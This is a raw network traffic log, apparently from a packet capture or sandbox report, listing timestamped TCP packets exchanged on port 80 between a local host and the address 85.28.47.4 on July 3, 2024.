Jul 3, 2024 18:08:39.783416033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783437967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783437967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783735037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783970118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783982038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783992052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.784009933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.784020901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.784024954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.784024954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.784033060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.784044027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.784054041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.784077883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.784077883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.784564018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868582010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868602037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868613005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868649960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868664026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868663073 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868663073 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868675947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868686914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868697882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868717909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868717909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868753910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868777037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868793011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868793011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868830919 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868864059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868875980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.868915081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868915081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.868997097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869008064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869019032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869024992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869038105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869050026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869066954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869066954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869164944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869175911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869199038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869199038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869270086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869282007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869294882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869304895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869304895 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869306087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869317055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869359016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869359970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869473934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869484901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869494915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869507074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869518042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869529009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869533062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869533062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869539976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869580030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869580030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869700909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869713068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869765997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869765997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869833946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869847059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869877100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869888067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869895935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869895935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869899988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869915009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869925976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869934082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869934082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.869937897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869950056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869961023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.869973898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870009899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870011091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870151043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870229959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870249033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870249987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870260954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870273113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870290995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870290995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870311022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870481014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870503902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870516062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870527029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870537043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870547056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870553017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870553970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870558023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870569944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870579958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870589972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870598078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870598078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870764971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870775938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870799065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870799065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870897055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870908976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870923996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870932102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870932102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.870934963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870945930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870958090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870968103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.870979071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871000051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871001005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871001005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871015072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871058941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871058941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871196985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871216059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871259928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871259928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871433973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871443987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871454000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871465921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871471882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871478081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871491909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871509075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871520042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871525049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871525049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871530056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871542931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871553898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871563911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871575117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871584892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871584892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871584892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871594906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871618986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871620893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871620893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871632099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871644020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.871659994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.871659994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872137070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872148037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872159004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872170925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872179031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872179031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872180939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872190952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872201920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872227907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872227907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872430086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872441053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872452974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872467995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872468948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872468948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872479916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872508049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872519970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872533083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872534990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872534990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872543097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872553110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872564077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872575998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872586012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872590065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872590065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872596979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.872634888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.872634888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957361937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957477093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957488060 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957515955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957515955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957566977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957587957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957598925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957606077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957688093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957701921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957719088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957719088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957725048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957748890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957751989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957770109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957771063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957783937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957793951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957803965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957803965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957804918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957853079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957853079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.957936049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957947016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957957983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957979918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.957990885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958002090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958014011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958019972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958019972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958019972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958019972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958034992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958185911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958187103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958199024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958209991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958225012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958235979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958236933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958249092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958260059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958271980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958276987 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958313942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958313942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958498001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958514929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958525896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958538055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958545923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958545923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958549976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958561897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958575964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958583117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958583117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958596945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958609104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958620071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958621979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958621979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958630085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958642006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958652973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.958677053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958677053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.958848953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959013939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959028959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959039927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959050894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959064007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959069967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959069967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959086895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959099054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959109068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959111929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959121943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959131956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959132910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959168911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959168911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959372997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959386110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959398985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959415913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959428072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959438086 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959438086 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959450006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959461927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959472895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959481955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959481955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959485054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959496975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959534883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959534883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959716082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959727049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959738016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959768057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959768057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959867001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959892035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959906101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959917068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959928989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959930897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959930897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959939957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959950924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959963083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959965944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959965944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.959974051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.959997892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960009098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960021019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960021019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960021973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960033894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960045099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960057974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960057974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960194111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960351944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.960390091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.960553885 CEST	80	49710	85.28.47.4	192.168.2.6
